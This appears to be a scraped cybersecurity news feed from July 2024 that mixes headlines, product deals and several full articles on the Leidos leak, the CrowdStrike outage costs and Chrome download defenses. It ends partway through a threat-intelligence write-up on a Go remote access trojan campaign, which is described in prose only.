Hackers have leaked internal documents stolen from Leidos Holdings Inc., a major U.S. government IT services provider, according to a source familiar with the situation. The company recently discovered the issue and believes the documents were taken during a previously disclosed breach of a third-party system it used. Leidos, which serves clients including the Defense Department, Department of Homeland Security and NASA, is investigating the matter. The company''s stock initially fell more than 4% in after-hours trading on the news before recovering most of its losses. Leidos Leak Believed to Stem From Third-Party Breach Leidos, formed in 2013 through the acquisition of Lockheed Martin Corp.''s IT business, was the largest federal IT contractor in the 2022 fiscal year, with $3.98 billion in contract obligations, according to Bloomberg Government data. The leaked documents are believed to have originated from a breach of a Diligent Corp. subsidiary, Steele Compliance Solutions. Leidos used Diligent''s system to store information from internal investigations, as noted in a June 2023 Massachusetts filing. While some purportedly leaked files were visible on a cybercrime forum, their authenticity could not be independently verified. Though the original report does not directly mention the name of the cybercrime forum, it appears to be BreachForums. [caption id=""attachment_83646"" align=""alignnone"" width=""1600""] Source: BreachForums.st[/caption] [caption id=""attachment_83648"" align=""alignnone"" width=""1600""] Source: BreachForums.st[/caption] A Diligent spokesperson confirmed that the leak appears to stem from a 2022 hack affecting Steele Compliance Solutions, which it acquired in 2021. The incident impacted fewer than 15 customers, including Leidos, which was initially notified in November 2022. ""We promptly notified impacted customers and took immediate corrective action to contain the incident,"" the Diligent spokesperson said. Leidos maintains that the breach did not affect its network or any sensitive customer data. ""We have confirmed that this stems from a previous incident affecting a third-party vendor for which all necessary notifications were made in 2023,"" a Leidos spokesperson stated. Leidos Leak Impact and Implications The company''s extensive government contracts and the nature of the leaked documents raise concerns about potential security implications. However, the full extent of the breach and the sensitivity of the leaked information remain unclear. The company has sought to reassure its customers, including the Defense Department, the Department of Homeland Security, and NASA, that the breach did not affect its network or sensitive customer data. According to the Bloomberg article, the Pentagon, Department of Homeland Security and NASA did not yet responded to requests for comments on the incident. In another incident that occurred more than a decade ago, hackers had stolen over 24,000 files from a defense contractor associated with the Pentagon. While the Pentagon did not mention what files had been stolen due to the level of secrecy associated with its content, former Deputy Defense Secretary William J. Lynn III admitted during a speech that it involved some of the U.S.’s “most sensitive systems, including aircraft avionics, surveillance technologies.”

by The Cyber Express

2024-07-24 22:33:48

Cyber Insurance Won’t Cover Billions in CrowdStrike Losses

The massive CrowdStrike outage will cost Fortune 500 companies more than $5 billion – and 80-90% of that won’t be covered by cyber insurance policies, according to cloud monitoring and insurance provider Parametrix. Parametrix estimates that the outage that hit about 8.5 million Windows machines will cost Fortune 500 companies $5.4 billion – and that number doesn’t include Microsoft’s own costs in implementing fixes and getting machines back up and running. “The portion of the loss covered under cyber insurance policies is likely to be no more than 10% to 20%, due to many companies’ large risk retentions, and to low policy limits relative to the potential outage loss,” the insurer said in a statement released today. Smaller customers will make the total CrowdStrike losses even higher, and victims are unlikely to get much help from CrowdStrike, as the company’s terms and conditions limit damages to refunds. Healthcare, Banking Hit Hardest by CrowdStrike Losses Parametrix said a quarter of the Fortune 500 was impacted by the outage, which CrowdStrike has attributed to a bug in its validation software that allowed a faulty update to be released. All of the of airlines in the Fortune 500 and 43% of retailer & wholesaler companies were hit by the flaw, which caused widespread Windows blue screen of death (BSOD) errors and required machines to be rebooted individually to be fixed. Roughly 75% of health and banking sector firms suffered direct costs, totaling more than $1 billion for banks and nearly $2 billion for healthcare companies. [caption id=""attachment_83655"" align=""aligncenter"" width=""2670""] CrowdStrike Financial Losses by Industry (source: Parametrix)[/caption] Beyond primary financial losses, “CrowdStrike’s impact on critical services resulted in a cascade of operational delays affecting the Fortune 500 companies and their downstream entities,” the company said. Parametrix concluded that traditional industries relying on physical computers experienced longer recovery times, “which underlines the resilience and rapid recovery of cloud-based systems.” CrowdStrike’s Customer Outreach Efforts Fall Flat Many cybersecurity observers have praised CrowdStrike’s forthright discussion of the event and its aftermath, but widespread outages that included thousands of machines in many affected environments have left customers feeling disaffected in many cases, and the company’s outreach efforts – which have included food vouchers in some cases – have been criticized as inadequate. Microsoft security researcher Kevin Beaumont shared one image of a customer complaining that a $100 DoorDash offering was a paltry sum for an outage that hit more than 150,000 devices in the unnamed organization: [caption id=""attachment_83652"" align=""aligncenter"" width=""500""] CrowdStrike DoorDash customer complaint[/caption] The annual Pwnie Awards gave CrowdStrike an early award for the outage (image below), just some of the snark and memes that have resulted from a top cybersecurity company making such a massive mistake. [caption id=""attachment_83654"" align=""aligncenter"" width=""450""] CrowdStrike Pwnie Award[/caption]

by The Cyber Express

2024-07-24 22:01:07

Small Businesses Need Default Security in Products Now

Small businesses are increasingly being targeted by cyberattackers. Why, then, are security features priced at a premium?

by Dark Reading

2024-07-24 21:48:44

Fighting Third-Party Risk With Threat Intelligence

With every new third-party provider and partner, an organization''s attack surface grows. How, then, do enterprises use threat intelligence to enhance their third-party risk management efforts?

by Dark Reading

2024-07-24 21:27:04

Docker Patches Critical AuthZ Plugin Bypass Vulnerability Dating Back to 2018

The vulnerability, tagged as CVE-2024-41110 with a CVSS severity score of 10/10, was originally found and fixed in 2018. The post Docker Patches Critical AuthZ Plugin Bypass Vulnerability Dating Back to 2018 appeared first on SecurityWeek.

by SecurityWeek

2024-07-24 21:25:32

Zest Security Aims to Resolve Cloud Risks

Cybersecurity startup Zest Security emerged from stealth with an AI-powered cloud risk resolution platform to reduce time from discovery to remediation.

by Dark Reading

2024-07-24 21:15:33

NSA releases top 10 tips to manage your cloud migration securely

Cloud environments are increasingly being targeted by malicious cyber actors, according to the National Security Agency (NSA).

by Barracuda

2024-07-24 21:00:23

Buy Microsoft Project Pro or Microsoft Visio Pro for $20 right now

Microsoft''s project management solutions include timesheet support, org charts, and more to help you stay organized -- and they''re on sale for 92% off for another few days.

by ZDNET Security

2024-07-24 20:49:37

U.S. CISA adds Microsoft Internet Explorer and Twilio Authy bugs to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Internet Explorer and Twilio Authy bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Below are the descriptions of the flaws added to the KEV catalog: CVE-2012-4792 (CVSS score of […]

by Security Affairs

2024-07-24 20:35:57

'Stargazer Goblin'' Amasses Rogue GitHub Accounts to Spread Malware

The threat group uses its "Stargazers Ghost Network" to star, fork, and watch malicious repos to make them seem legitimate, all to distribute a variety of notorious information-stealers-as-a-service.

by Dark Reading

2024-07-24 20:34:31

From tee to trophy: Meet the 2024 Barracuda Championship winner

Nick Dunlap emerges as the champion of the 26th annual Barracuda Championship. Learn about his professional journey as a golf player in this piece.

by Barracuda

2024-07-24 20:30:23

Learn a new language with a Babbel subscription for 76% off right now

Save $459 on a Babbel Language Learning subscription and learn 14 new languages with this deal.

by ZDNET Security

2024-07-24 20:06:00

How my 4 favorite AI tools help me get more done at work

I''ve tested a lot of AI tools. These are the four I use almost daily to enhance my productivity.

by ZDNET Security

2024-07-24 20:00:24

The best external hard drives of 2024: Expert tested

I''ve rigorously evaluated the top external hard drives available today, to help you find the most reliable and cost-effective backup storage solution.

by ZDNET Security

2024-07-24 19:44:51

Meta Quest 3 is getting AI before Apple's Vision Pro does - here''s how to enable it

Beyond answering basic questions, Meta AI on the Quest 3 headset will be able to analyze your outfit, find things to do, and more.

by ZDNET Security

2024-07-24 19:30:22

Sign up for a Costco membership and get a $40 gift card, free. Here's how

Don''t miss this rare Costco deal that gives you a $40 store card with your Gold Star membership purchase -- effectively cutting the price down to just $20. (I bought one and highly recommend it.)

by ZDNET Security

2024-07-24 19:15:33

Telcos given extra time to retire 3G networks

Two mobile operators in Singapore are granted more time to move their 3G customers to newer networks, while a third telco already has done so on schedule.

by ZDNET Security

2024-07-24 19:10:12

Venture Capital: The New National Security Risk

U.S. national security agencies are warning technology startups to be wary of foreign venture capital investments that may be attempts to steal secrets. The warning, issued today by the Director of National Intelligence’s National Counterintelligence and Security Center (NCSC) and three other agencies, notes that concern about startup investments by the People’s Republic of China (PRC) has been an issue since at least 2018, but recent events have heightened concerns that the PRC is using VC investments to attempt to gain access to AI technology and other sensitive intellectual property (IP). The guidance – and the threat of lost business and deals if national security risks are later discovered – puts startups in the difficult position of judging investor ownership at the same time that they may be seeking a critical financial lifeline. The NCSC document spells out warning signs to look for in a venture investor, and also shares some horror stories of stolen startup intellectual property. IDG Capital, Other Venture Capital Threats Cited The warning from NCSC, DNI’s Office of Economic Security and Emerging Technologies (OESET), and the Air Force and Navy criminal investigative services, notes that in January 2024, the U.S. Department of Defense (DoD) added China-based private equity firm IDG Capital to its list of “‘Chinese military companies’ operating directly or indirectly in the U.S.” IDG Capital, which has invested in more than 1,600 companies, including several in the U.S., denies DoD’s claims. The agencies’ warning cites a few examples where a venture investment masked hidden national security risks. Last year, the CEO of a U.S. startup that is suing defendants in China for trade secret theft testified before Congress that some China-based VC firms may target and pay employees of U.S. startups to acquire technology, then fund competitors in China who try to monetize the stolen technology. Some U.S. and European firms have claimed that China-based investors offered them investments, then withdrew the offers after obtaining their proprietary data in the due diligence process. One U.K. firm, after agreeing to a takeover by an investor in China, began transferring technology in exchange for part of the acquisition price. The investor later abandoned the acquisition, and the U.K. firm faced bankruptcy after sharing its IP. In addition to stolen IP and lost market share, the agencies note that startups can also be denied U.S. government contracts or small business funding if foreign threat actors have been found to have a presence in their firms. Warning Signs of Foreign VC Involvement – And Defensive Steps The NCSC document acknowledges the difficulty of determining “the ownership and intent of foreign investors,” and offers some warning signs of foreign investment and some defensive steps to take. Foreign investors may structure investments to avoid scrutiny from the Committee on Foreign Investment in the United States (CFIUS), which reviews mergers, acquisitions, and investments that may have national security implications. They may route investments through intermediaries in the U.S. or other countries, and use minority and limited partner investments. Some of the tactics that could be warning signs of foreign threat actors may also be routine legal moves, complicating assessment efforts. These include complex ownership, including separate entities that share key personnel, or shell companies “with no substantive purpose.” Incorporation in offshore locations lacking transparency and oversight is another such tactic. Investments through funds, partners, or intermediaries in the U.S. or other countries can be another potential warning sign, as can Limited Partner Investments and requests for proprietary or other sensitive data. “Startups should be alert to intrusive requests for sensitive data,” the document notes. Before seeking investments, the agencies advise startups to “identify and compartmentalize your company’s ‘crown jewels’” with physical and virtual protections and access restrictions. A risk manager should be empowered to protect assets, and startups should make sure that legal and contractual agreements “are enforceable in the investor’s home country.” Startups with concerns or tips about potential foreign investments with national security implications should contact CFIUS, the FBI or DoD, the guidance notes.

by The Cyber Express

2024-07-24 19:00:23

HHS audit finds serious gaps in cloud security at agency office

Penetration testers were able to access sensitive information stored by the HHS Office of the Secretary.

by SC Media

2024-07-24 18:50:04

Cyberattackers Exploit Microsoft SmartScreen Bug in Stealer Campaign

The good news: Only organizations far behind on standard Windows patching have anything to worry about.

by Dark Reading

2024-07-24 18:50:03

Google Chrome’s New Defenses Against Malicious Downloads

Chrome has quietly bolstered its defenses against malicious downloads, leveraging AI and user behavior insights to thwart a growing array of threats. Google''s browser has introduced a more nuanced warning system, distinguishing between ""suspicious"" and ""dangerous"" files, and automating deep scans for enhanced protection of users. The move aims to pre-empt threats like cookie theft malware hidden within encrypted archives. The latest changes were introduced after Chrome recently updated its user interface. ""Taking advantage of the additional space available in the new downloads UI, we have replaced our previous warning messages with more detailed ones that convey more nuance about the nature of the danger and can help users make more informed decisions,"" Google''s security team said. [caption id=""attachment_83625"" align=""aligncenter"" width=""500""] Differentiation between ""Suspicious"" and ""Dangerous"" warnings (Source: Google Security Blog)[/caption] Chrome Gets AI, Machine Learning, Deep Scans By leveraging AI and machine learning, Chrome offers more granular warnings, automatic deep scans, and protections against encrypted archive-based attacks. The redesigned download experience offers more than just aesthetic improvements. It’s a tactical shift in Google’s defense strategy. By providing detailed warnings, Chrome hopes to empower users to make informed decisions about file downloads. The two-tier warning system, backed by AI-powered malware verdicts from Google Safe Browsing, adds granularity to threat assessments. The results are tangible: fewer ignored warnings and quicker responses to threats. Enhanced Protection Against Malicious Downloads A particularly intriguing development is the expansion of automatic deep scans for Enhanced Protection users. While this might sound like a minor tweak, it''s a significant step forward. By proactively scanning suspicious files, Chrome can catch never-before-seen malware and disrupt attack chains early. The claim that files sent for deep scanning are over 50 times more likely to be flagged as malware underscores the efficacy of this approach. However, attackers are not standing still. A disturbing trend involves packaging malware in encrypted archives, a technique that evades traditional detection methods. Chrome counters this by prompting users to enter passwords for suspicious archives. While this adds a layer of complexity, it''s a necessary evil to prevent the spread of concealed threats. [caption id=""attachment_83624"" align=""aligncenter"" width=""500""] Prompt to enter a file password to send an encrypted file for a malware scan (Source: Google Security Blog)[/caption] Chrome Standard Protections For users on the default Standard Protection mode, Chrome offers a more limited, but still valuable, defense. It prompts password entry for suspicious encrypted archives, but instead of sending the file for deep scanning, it merely checks the archive''s metadata against known threats. While this approach is less robust, it provides a baseline of protection for the majority of users. Chrome’s enhanced download protections represent a significant stride in the ongoing battle against malware. By combining AI-driven analysis, user education, and proactive defense, Google has created a formidable barrier against malicious downloads. While these enhancements are commendable, the evolving threat landscape demands continuous innovation. As Google''s Threat Analysis Group and security researchers worldwide uncover new tactics, Chrome must adapt accordingly. The success of these new defenses will ultimately be determined by their ability to stay ahead of a relentless adversary.

by The Cyber Express

2024-07-24 18:44:07

Meet Stability AI's Stable Video 4D, a nuanced take on AI video generation

With its first video-to-video AI model, Stability AI pushes the boundaries for AI video generation even further.

by ZDNET Security

2024-07-24 18:44:05

Upgrade to Windows 11 Pro for $25 right now

Get a lifetime Windows 11 Pro license with more productivity features that will help you get things done -- and it''s 87% off with this deal.

by ZDNET Security

2024-07-24 18:40:54

How to watch the 2024 Summer Olympics: Every streaming option

The Summer Olympics start this Friday. Here''s how to watch the opening ceremony and the games, in some cases for free.

by ZDNET Security

2024-07-24 18:36:01

I tested the 3 best VPNs for streaming ahead of the Summer Olympics

The Summer Olympics have arrived. With the right VPN service, you can stream the games and watch all the action, no matter where you are in the world.

by ZDNET Security

2024-07-24 18:24:03

Zest Security Aims to Resolve, Not Just Mitigate Cloud Risks

Zest Security emerged from stealth with $5 million funding and an AI-powered platform that resolves the root source of risk in the cloud. The post Zest Security Aims to Resolve, Not Just Mitigate Cloud Risks appeared first on SecurityWeek.

by SecurityWeek

2024-07-24 18:18:54

Strategic Insights: The Importance of Dark Web Monitoring for CEOs

Security experts have stressed the importance of dark web monitoring for CEOs of businesses and enterprises of all sizes as an essential measure to prioritize the safety and integrity of their organization''s digital presence. Password and data breaches shared on the dark web and in cybercriminal communities have become a common occurrence, leaving businesses vulnerable to severe consequences, including stolen bank accounts and identity theft. To combat this threat, dark web monitoring is a proactive option to help identify, detect and mitigate potential breaches before they escalate into embarrassing major security incidents. CEOs Guide to Dark Web Monitoring The dark web is a small part of the deep web, which is generally considered an unindexed sub-layer of the internet, ignored by or inaccessible to conventional search engines. This anonymous environment is a hub for illegal activities, including the commission and sale of sensitive data such as digital credentials and records. Dark web monitoring is a specialized process that involves searching for and monitoring the spread of records related to organization or entity information across the dark web. Using advanced algorithms and techniques, dark web monitoring tools provide enhanced detection capabilities, allowing businesses to stay ahead of cyber threats. The financial implications of a cyber attack can be severe. In 2020, DSG Retail Limited was fined £500,000 by the UK''s Information Commissioner''s Office after a point-of-sale system breach affected 14 million people, for example. A study conducted at King’s College London revealed that over 60% of more than 2,700 darknet sites were found to host illicit content facilitating criminal activity. It''s essential for CEOs to understand the techniques and methods cybercriminals use to steal data, such as phishing, malware, and keylogging, to recognize and prevent these threats. For CEOs, the stakes are high. A single compromised password can lead to devastating consequences, from financial losses to reputational damage. With 80% of individuals reusing passwords across multiple accounts, the risk of a breach extends far beyond a single compromised system. Quick response by CEOs can be an important factor in limiting damage, and that''s where dark web monitoring comes in. The Sale of Ransomware and Malware The dark web is a hub for the sale of ransomware malware that is used in threat campaigns. These attacks can be devastating for businesses, such as the 2017 WannaCry attack on the UK''s NHS that reportedly led to it losing £92 million as well as the cancellation of over 19,000 appointments. In the same year, shipping giant A.P. Moller-Maersk suffered losses of between $200-$300 million due to the NotPetya ransomware attack, which rendered apps, laptops, and servers useless. Dark web monitoring can help counter threat posed by sale of such services among dark web forums. The Sale of Business Data If your business is hacked and your data stolen, it may well end up for sale on the dark web making it critical for a suitable platform providing dark web threat intelligence for corporate leaders. Hackers also sell access to breached company databases, leaving them open to the theft of everything from financial information to employees'' personal details. Last year, Kaspersky researchers observed almost 40,000 dark web posts about the sale of internal corporate information, a 16% increase compared to the previous year. The Sale of Credit Card Details It''s estimated that over 23 million credit cards are offered for sale on the dark web, which may have come from a variety of sources, including online stores'' checkout processes. Marketplaces called Automated Vending Carts (AVCs) are used to sell credit card details without the buyer and seller needing to interact. Importance of Dark Web Monitoring for CEOs Dark web monitoring offers a strategic advantage in the ongoing battle against cybercrime. Here are some benefits of dark web monitoring for business executives. Detect breaches early: Identify compromised credentials before they''re exploited. Assess vulnerabilities: Gain insights into potential weak points in security protocols. Enhance incident response: React swiftly to emerging threats with actionable intelligence. Protect executive data: Organizations can place special focus on protecting executive data through dark web monitoring tools. Implementing a robust dark web monitoring program allows CEOs to stay ahead of potential threats, protecting their company''s assets and reputation. This is crucial given the rise of ransomware-as-a-service and malware-as-a-service packages on the dark web, which enable even non-technical criminals to launch sophisticated attacks. Building a Security Strategy While dark web monitoring is a powerful tool, it''s just one piece of a comprehensive cybersecurity strategy. CEOs should consider: Dark Web Monitoring: Reliable dark web risks and monitoring solutions for CEOs such as Cyble Vision or Cyble Darkweb Intelligence can be integrated into broader security strategies to provide dark web threat intelligence for corporate leaders. Employee education: Train staff to recognize and report potential security threats or respond to claims of breach or compromise. Dedicated staff should feel encouraged to make reports on strategic insights on dark web threats for executives. Multi-factor authentication: Implement additional layers of security beyond passwords to protect against leaked credentials offered for sale on the Dark Web. Regular security audits: Continuously assess and improve organizational defenses. By combining dark web monitoring with these broader security measures, CEOs can create a robust defense against evolving cyber threats. Leverage AI tools in security implementation: Incorporate AI-powered dark web monitoring solutions like Cyble’s award-winning cyber threat intelligence platform to make use of rich automated feeds. These automated feeds can help in updating dark web monitoring strategies for company CEOs. In an era where data is a precious commodity, dark web monitoring can give CEOs critical insights to safeguard their organizations, and the peace of mind that rapid insight and response can give.  

by The Cyber Express

2024-07-24 18:17:00

How to enable Slack notifications on your Apple Watch

Learn how to always stay connected to your team without having to carry your iPhone everywhere. We step you through all the settings you''ll need to make it work.

by ZDNET Security

2024-07-24 18:09:17

The best MagSafe battery packs of 2024: Expert tested and reviewed

We tested the best MagSafe battery packs from Baseus, Anker, Belkin, and more to keep your phone''s battery boosted everywhere you go.

by ZDNET Security

2024-07-24 17:58:59

Over 3,000 GitHub accounts used by malware distribution service

Threat actors known as ''Stargazer Goblin'' have created a malware Distribution-as-a-Service (DaaS) from over 3,000 fake accounts on GitHub that push information-stealing malware. [...]

by BleepingComputer

2024-07-24 17:57:48

The best portable jump starters of 2024: Expert recommended

We tested and researched the best portable jump starters to help you build the perfect roadside emergency kit for your car, truck, or SUV.

by ZDNET Security

2024-07-24 17:54:00

One of the best E Ink tablets I've tested is not a ReMarkable or Kindle Paperwhite

The Onyx Boox Page offers just the right amount of capabilities and limitations for an e-reader, and it''s still better than the Kindle Paperwhite.

by ZDNET Security

2024-07-24 17:53:06

Rhysida using Oyster Backdoor to deliver ransomware

In a recent attack, Rhysida used a new variant of the Oyster backdoor, also known as Broomstick.

by ThreatDown

2024-07-24 17:49:14

Microsoft in 2024: Top Stories (So Far)

Our most-read articles about Microsoft explore the company’s AI endeavors, formidable security hurdles, and ethical challenges.

by ITPro Today

2024-07-24 17:39:06

TracFone will pay $16 million to settle FCC data breach investigation

Prepay wireless provider TracFone has been slapped on the wrist to the tune of $16 million for insufficient customer data protection

by Malwarebytes Labs

2024-07-24 17:31:17

Hackers bypass Windows SmartScreen flaw to launch malware

Cybercriminals are stepping up efforts to bypass a critical component in Microsoft Defender in order to covertly install malware

by SC Media

2024-07-24 17:31:00

How a Trust Center Solves Your Security Questionnaire Problem

Security questionnaires aren’t just an inconvenience — they’re a recurring problem for security and sales teams. They bleed time from organizations, filling the schedules of professionals with monotonous, automatable work. But what if there were a way to reduce or even altogether eliminate security questionnaires? The root problem isn’t a lack of great questionnaire products — it’s the

by The Hacker News

2024-07-24 17:29:21

Microsoft’s AI Assistants Will Revolutionize the Office — One Day

Early adopters say deploying the company’s Copilot bots requires cleaning up corporate data and lots of employee training.

by ITPro Today

2024-07-24 17:29:13

Cybersecurity Awareness Month 2024 Kick-off

It''s been 20 years since the first Cybersecurity Awareness Month, and now is the ideal moment to reflect on decades of success and what challenges lie ahead of us. Since 2004, every October has been dedicated to keeping us all say and secure online. There is always more to do. How can the public and private sectors continue to work together to secure technology, protect critical infrastructure, and bring more workers, consumers, companies, and organizations into a safer future? Elected officials, government leaders, and industry executives will join together this October to work toward building a safer connected world. The post Cybersecurity Awareness Month 2024 Kick-off appeared first on National Cybersecurity Alliance.

by National Cybersecurity Alliance

2024-07-24 17:29:00

Telegram App Flaw Exploited to Spread Malware Hidden in Videos

A zero-day security flaw in Telegram''s mobile app for Android called EvilVideo made it possible for attackers to malicious files disguised as harmless-looking videos. The exploit appeared for sale for an unknown price in an underground forum on June 6, 2024, ESET said. Following responsible disclosure on June 26, the issue was addressed by Telegram in version 10.14.5 released on July 11. ""

by The Hacker News

2024-07-24 17:08:14

Dazz Scores Hefty $50M Investment for AI-Powered Risk Remediation Tech

The new financing brings the total raised by Dazz to $110 million as investors double down on bets in the cloud security remediation space. The post Dazz Scores Hefty $50M Investment for AI-Powered Risk Remediation Tech appeared first on SecurityWeek.

by SecurityWeek

2024-07-24 17:05:30

OpenAI's budget GPT-4o mini model is now cheaper to fine-tune, too

Re-training the new budget GPT is less than half the cost of doing the same with OpenAI''s older models.

by ZDNET Security

2024-07-24 17:00:55

The best headphones for working out: Expert tested and reviewed

We''ve run, swam, hiked, and biked in these headphones and earbuds to help you choose the best headphones for working out.

by ZDNET Security

2024-07-24 16:58:00

This versatile Dell laptop surprised me with 3 standout features

Dell''s 2024 Inspiron Plus 16 sees some hardware upgrades for AI readiness, while preserving the series'' identity as a versatile and dependable machine.

by ZDNET Security

2024-07-24 16:50:05

Hamster Kombat Players Threatened by Spyware & Infostealers

Players can only access the game by first joining its Telegram channel, with some going astray in copycat channels with hidden malware.

by Dark Reading

2024-07-24 16:48:00

Poll: CISOs stick with CrowdStrike, share lessons learned

The CyberRisk Collaborative convened a Rapid Action Meeting to allow members a forum to discuss the incident, share information, and obtain advice from fellow members.

by SC Media

2024-07-24 16:34:03

CrowdStrike update leads to massive IT outage worldwide

A faulty update from cybersecurity firm CrowdStrike for Microsoft software on July 19 led to a massive IT outage worldwide that affected an estimated 8.5 million Windows devices.

by SC Media

2024-07-24 16:26:03

Ransomware targeting FinServ: What you need to know

The median ransom demand in financial services is $2 million.

by SC Media

2024-07-24 16:20:02

This AI-powered Linux terminal app can help you learn how to use commands

If you''re new to the Linux command line, AI Shell is a powerful tool to check out.

by ZDNET Security

2024-07-24 16:12:37

Exploiting Compliance: Ransomware Gang Tactics

Understand the methods ransomware gangs use to exploit security compliance and how Darktrace''s AI can mitigate these threats.

by Darktrace

2024-07-24 15:47:35

Pro-Russian NoName Targets Spain

NoName announced a new operation, this time against Spain. The attack targeted multiple websites, including those of the Constitutional Court of Spain and the Madrid […]

by Privacy Affairs

2024-07-24 15:44:41

AS-REP roasting detection

Learn how to detect AS-REP roasting attacks in part two of a special five-part series on critical Active Directory (AD) attack detections & misconfigurations.

by Hack The Box Blog

2024-07-24 15:41:13

CrowdStrike offers a $10 apology gift card to say sorry for outage

Several people who received the CrowdStrike offer found that the gift card didn''t work, while others got an error saying the voucher had been canceled. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-24 15:31:00

How to Reduce SaaS Spend and Risk Without Impacting Productivity

There is one simple driver behind the modern explosion in SaaS adoption: productivity. We have reached an era where purpose-built tools exist for almost every aspect of modern business and it’s incredibly easy (and tempting) for your workforce to adopt these tools without going through the formal IT approval and procurement process. But this trend has also increased the attack surface—and with

by The Hacker News

2024-07-24 15:28:20

Darktrace: Investigating Widespread Trojan Infections

Discover how Darktrace expedites the investigation of widespread Trojan infections, enhancing cybersecurity and response times.

by Darktrace

2024-07-24 15:13:00

Patchwork Hackers Target Bhutan with Advanced Brute Ratel C4 Tool

The threat actor known as Patchwork has been linked to a cyber attack targeting entities with ties to Bhutan to deliver the Brute Ratel C4 framework and an updated version of a backdoor called PGoShell. The development marks the first time the adversary has been observed using the red teaming software, the Knownsec 404 Team said in an analysis published last week. The activity cluster, also

by The Hacker News

2024-07-24 15:00:03

Docker fixes critical 5-year old authentication bypass flaw

Docker has issued security updates to address a critical vulnerability impacting certain versions of Docker Engine that could allow an attacker to bypass authorization plugins (AuthZ) under certain circumstances. [...]

by BleepingComputer

2024-07-24 14:52:19

Is GhostEmperor Back? Sygnia Finds Clues in Recent Cyber Incident

Sygnia discovered what it believes to be a variant of the GhostEmperor infection chain leading to the Demodex rootkit – which was first seen and described in 2021. The post Is GhostEmperor Back? Sygnia Finds Clues in Recent Cyber Incident appeared first on SecurityWeek.

by SecurityWeek

2024-07-24 14:38:31

AT&T outage blocked more than 25,000 emergency calls, says FCC

FCC report says a network misconfiguration by an AT&T Mobility employee caused the 12-hour outage.

by SC Media

2024-07-24 14:28:12

Network of ghost GitHub accounts successfully distributes malware

Check Point researchers have unearthed an extensive network of GitHub accounts that they believe provides malware and phishing link Distribution-as-a-Service. Set up and operated by a threat group the researchers dubbed as Stargazer Goblin, the “Stargazers Ghost Network” is estimated to encompass over 3,000 active accounts, some created by the group and others hijacked. “The network distributed all sorts of malware families, including Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine,” they found. The set-up … More → The post Network of ghost GitHub accounts successfully distributes malware appeared first on Help Net Security.

by Help Net Security

2024-07-24 14:26:54

CrowdStrike Blames Crash on Buggy Security Content Update

CrowdStrike vows to provide customers with greater control over the delivery of future content updates by allowing granular selection of when and where these updates are deployed.

by Dark Reading

2024-07-24 14:05:18

Mimecast Announces Acquisition of Code42, Expands Human Risk Management Platform with Visibility into Insider Threats

Mimecast, a leading global human risk management platform, announced today the acquisition of Code42, a leader in insider threat and data loss protection. Expanding on the success of their existing technology partnership, this acquisition marks a critical step in Mimecast’s strategy to revolutionize how organizations manage and mitigate human-centered security risks. Financial terms of the deal […] The post Mimecast Announces Acquisition of Code42, Expands Human Risk Management Platform with Visibility into Insider Threats first appeared on IT Security Guru. The post Mimecast Announces Acquisition of Code42, Expands Human Risk Management Platform with Visibility into Insider Threats appeared first on IT Security Guru.

by IT Security Guru

2024-07-24 14:05:11

Microsoft fixes bug behind Windows 10 Connected Cache delivery issues

Microsoft has fixed a known Windows 10 update issue that broke Microsoft Connected Cache (MCC) node discovery on enterprise networks. [...]

by BleepingComputer

2024-07-24 14:02:00

CrowdStrike Explains Friday Incident Crashing Millions of Windows Devices

Cybersecurity firm CrowdStrike on Wednesday blamed an issue in its validation system for causing millions of Windows devices to crash as part of a widespread outage late last week. ""On Friday, July 19, 2024 at 04:09 UTC, as part of regular operations, CrowdStrike released a content configuration update for the Windows sensor to gather telemetry on possible novel threat techniques,"" the company

by The Hacker News

2024-07-24 14:00:00

Navigating the Complex Landscape of Web Browser Security

The more we use the cloud, the more maintaining browser security becomes crucial.

by Dark Reading

2024-07-24 13:58:05

Indian Firm Linked to Fake DMCA Notices Silencing Journalists

Is critical journalism under attack? A recent exposé reveals a disturbing trend: Companies, in this case, an Indian…

by Hackread

2024-07-24 13:41:17

Operation ShadowCat: Targeting Indian Political Observers via a Stealthy RAT

Key Takeaways  Cyble Research and Intelligence Labs (CRIL) came across an intriguing shortcut (.LNK) file masquerading as a legitimate Office document.  When the user executes the LNK file, it triggers the infection process, which runs a PowerShell command to drop and execute a .NET loader, ultimately delivering the final payload to the victim''s machine.  The Threat Actor (TA) employs steganography to conceal a malicious Gzip-compressed payload within a PNG file, which is hosted on a Content Delivery Network (CDN).  The decompressed payload is then injected into PowerShell.exe using the Asynchronous Procedure Call (APC) injection method.  The final payload is a RAT (Remote Access Trojan) written in Go. It is designed to take control of the compromised machine and deploy ransomware on the victim''s device.  The TA excludes infections from Russian-speaking regions, indicating that the TA could potentially be a Russian-speaking individual or group.  Based on the lure used in this campaign, we observed that the TA is targeting individuals with a keen interest in Indian political affairs.  This could include government officials, political analysts, journalists, researchers, and think tanks who closely follow parliamentary proceedings.  Overview  A security researcher first detected and reported a similar variant in 2023. Based on these similarities, we suspect that the malicious LNK file is distributed to users via spam email.  The attack starts with a deceptive shortcut (.LNK) file that deceives users into opening it. Once executed, the .LNK file runs a PowerShell command that drops a malicious .NET loader file and a decoy Word document on the victim’s machine. The PowerShell script then invokes methods in the .NET file, which are designed to fetch a steganographic PNG image from a remote server.   This image contains a Gzip-compressed payload. The methods also decompress the payload and inject it into the PowerShell.exe process. These actions are executed entirely in memory to avoid detection by security products.   Cyble Research & Intelligence Labs has dubbed this attack ""Operation ShadowCat"" due to its stealthy characteristics, including the use of a C&C server at “use1.netcatgroup.site” and the custom ""NetCat"" subprotocol employed for WebSocket communication.  The final payload is a RAT written in the Go programming language. This RAT provides extensive control over the infected system, enabling file and directory manipulation, command execution, and interactive communication with a Command & Control server.   Upon successful infection, this RAT can enable ransomware activities, stage environments for payload deployment, gather detailed system information, perform network scanning, and upload sensitive data from the victim’s machine. It also uses tools for Active Directory mapping and credential extraction, facilitating advanced lateral movement and attack strategies. The figure below shows an overview of the infection.  Figure 1 - Overview of the Attack  Technical Analysis  The attack originates from a shortcut file named “Untitled Document.LNK”. This file appears to be a Word document but conceals its malicious content within the Shortcut Target path, as shown below.          Figure 2- Properties of .LNK file   When the user executes the LNK file, it loads the embedded PowerShell script, as shown in the figure below.  Figure 3- Malicious PowerShell script  The PowerShell script can be divided 